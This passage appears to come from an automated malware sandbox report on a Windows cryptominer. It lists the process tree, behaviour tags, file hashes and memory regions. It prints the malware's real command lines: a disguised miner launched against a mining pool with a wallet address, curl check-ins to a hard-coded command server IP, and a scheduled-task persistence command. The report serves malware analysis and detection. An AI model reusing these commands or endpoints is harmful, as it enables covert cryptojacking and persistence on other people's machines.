- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX12⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"12⤵
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"13⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"13⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX14⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"14⤵
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"15⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"15⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX16⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"16⤵
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"17⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"17⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX18⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"18⤵
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"19⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"19⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX20⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"20⤵
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"21⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"21⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX22⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"22⤵
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"23⤵
-
C:\Users\Admin\AppData\Roaming\asf3r3.exe"C:\Users\Admin\AppData\Roaming\asf3r3.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\e3dwefw.exe"C:\Users\Admin\AppData\Roaming\e3dwefw.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe dc10dc428c424782dfda32cfa06f8fbf oWLZ1E4gW0a9DAkkf1GvUg.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"2⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\loader.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Local\Temp\loader.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeMD5
67486b272027c5c08c37d2a7dfa3b019
SHA1660cd3fa71e480e03b392ccfff95b1a651ec1563
SHA256cb2f3c7a11ff1993ed3a24d396beeca0f06842b9cd9097351a7c8662250ec677
SHA5126565af5f8e090285258a0abf4faa1c99790b409f4ed8a4233048614ca470f1d7c4a40f951bd7c2664c567f7788f9e689afb3d72fcff853d888fef5b40051cf61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeMD5
67486b272027c5c08c37d2a7dfa3b019
SHA1660cd3fa71e480e03b392ccfff95b1a651ec1563
SHA256cb2f3c7a11ff1993ed3a24d396beeca0f06842b9cd9097351a7c8662250ec677
SHA5126565af5f8e090285258a0abf4faa1c99790b409f4ed8a4233048614ca470f1d7c4a40f951bd7c2664c567f7788f9e689afb3d72fcff853d888fef5b40051cf61
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
1393255baa29e16a2a5cf2afa989e1e8
SHA137e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\asf3r3.exeMD5
654b0fbc5f45e7aa0d208a9ae2352f30
SHA1d91b8b6a3d1815010973db6189fc1f7b73e98dd8
SHA256808bad1396611118abb83a7d09940c7c47d785511db2e5b652becf9ec67cdb19
SHA512807a471d51a5e7f22f19a7cd0775f852519c256b3592136b4f673dcc8b53488698c5830d75cfc461937a5a485963c37e1eb4e18c40446ac241df1b859a242234
-
C:\Users\Admin\AppData\Roaming\asf3r3.exeMD5
654b0fbc5f45e7aa0d208a9ae2352f30
SHA1d91b8b6a3d1815010973db6189fc1f7b73e98dd8
SHA256808bad1396611118abb83a7d09940c7c47d785511db2e5b652becf9ec67cdb19
SHA512807a471d51a5e7f22f19a7cd0775f852519c256b3592136b4f673dcc8b53488698c5830d75cfc461937a5a485963c37e1eb4e18c40446ac241df1b859a242234
-
C:\Users\Admin\AppData\Roaming\e3dwefw.exeMD5
67486b272027c5c08c37d2a7dfa3b019
SHA1660cd3fa71e480e03b392ccfff95b1a651ec1563
SHA256cb2f3c7a11ff1993ed3a24d396beeca0f06842b9cd9097351a7c8662250ec677
SHA5126565af5f8e090285258a0abf4faa1c99790b409f4ed8a4233048614ca470f1d7c4a40f951bd7c2664c567f7788f9e689afb3d72fcff853d888fef5b40051cf61
-
C:\Users\Admin\AppData\Roaming\e3dwefw.exeMD5
67486b272027c5c08c37d2a7dfa3b019
SHA1660cd3fa71e480e03b392ccfff95b1a651ec1563
SHA256cb2f3c7a11ff1993ed3a24d396beeca0f06842b9cd9097351a7c8662250ec677
SHA5126565af5f8e090285258a0abf4faa1c99790b409f4ed8a4233048614ca470f1d7c4a40f951bd7c2664c567f7788f9e689afb3d72fcff853d888fef5b40051cf61
-
memory/224-225-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/556-189-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/904-301-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1284-314-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/1284-316-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/1284-315-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/1340-292-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1420-207-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1484-170-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1484-169-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1544-202-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/1544-203-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/1544-204-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/1720-221-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/1720-220-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/1720-222-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2016-274-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/2368-269-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2368-270-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2368-271-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2580-298-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2580-297-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2580-296-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2756-167-0x00007FF7575B0000-0x00007FF757E98000-memory.dmpFilesize
8.9MB
-
memory/2756-165-0x00007FF7575B0000-0x00007FF757E98000-memory.dmpFilesize
8.9MB
-
memory/2756-166-0x00007FF7575B0000-0x00007FF757E98000-memory.dmpFilesize
8.9MB
-
memory/2772-168-0x0000000140000000-0x000000014274C000-memory.dmpFilesize
39.3MB
-
memory/2828-133-0x0000000005BD0000-0x0000000005C62000-memory.dmpFilesize
584KB
-
memory/2828-137-0x0000000005F70000-0x0000000005FE6000-memory.dmpFilesize
472KB
-
memory/2828-150-0x0000000005B40000-0x0000000005B5E000-memory.dmpFilesize
120KB
-
memory/2828-132-0x0000000006180000-0x0000000006724000-memory.dmpFilesize
5.6MB
-
memory/2828-131-0x0000000005AF0000-0x0000000005AF1000-memory.dmpFilesize
4KB
-
memory/2828-130-0x0000000000FE0000-0x0000000001140000-memory.dmpFilesize
1.4MB
-
memory/2828-151-0x0000000006020000-0x000000000602A000-memory.dmpFilesize
40KB
-
memory/2856-244-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2856-246-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2856-243-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2928-251-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2928-252-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/2928-253-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/3024-249-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3060-289-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/3060-287-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/3060-288-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/3084-155-0x00000000049B0000-0x00000000049C2000-memory.dmpFilesize
72KB
-
memory/3084-162-0x00000000074D0000-0x0000000007520000-memory.dmpFilesize
320KB
-
memory/3084-157-0x0000000005540000-0x0000000005702000-memory.dmpFilesize
1.8MB
-
memory/3084-158-0x0000000004900000-0x0000000004F18000-memory.dmpFilesize
6.1MB
-
memory/3084-156-0x0000000004AE0000-0x0000000004BEA000-memory.dmpFilesize
1.0MB
-
memory/3084-154-0x0000000004F20000-0x0000000005538000-memory.dmpFilesize
6.1MB
-
memory/3084-153-0x0000000000500000-0x000000000056C000-memory.dmpFilesize
432KB
-
memory/3084-161-0x0000000006830000-0x000000000686C000-memory.dmpFilesize
240KB
-
memory/3084-159-0x00000000069D0000-0x0000000006EFC000-memory.dmpFilesize
5.2MB
-
memory/3084-160-0x0000000006580000-0x00000000065E6000-memory.dmpFilesize
408KB
-
memory/3100-245-0x0000000004F40000-0x0000000005558000-memory.dmpFilesize
6.1MB
-
memory/3100-240-0x0000000000740000-0x0000000000760000-memory.dmpFilesize
128KB
-
memory/3300-256-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3908-186-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/3908-184-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/3908-185-0x00007FF641840000-0x00007FF642128000-memory.dmpFilesize
8.9MB
-
memory/3964-319-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB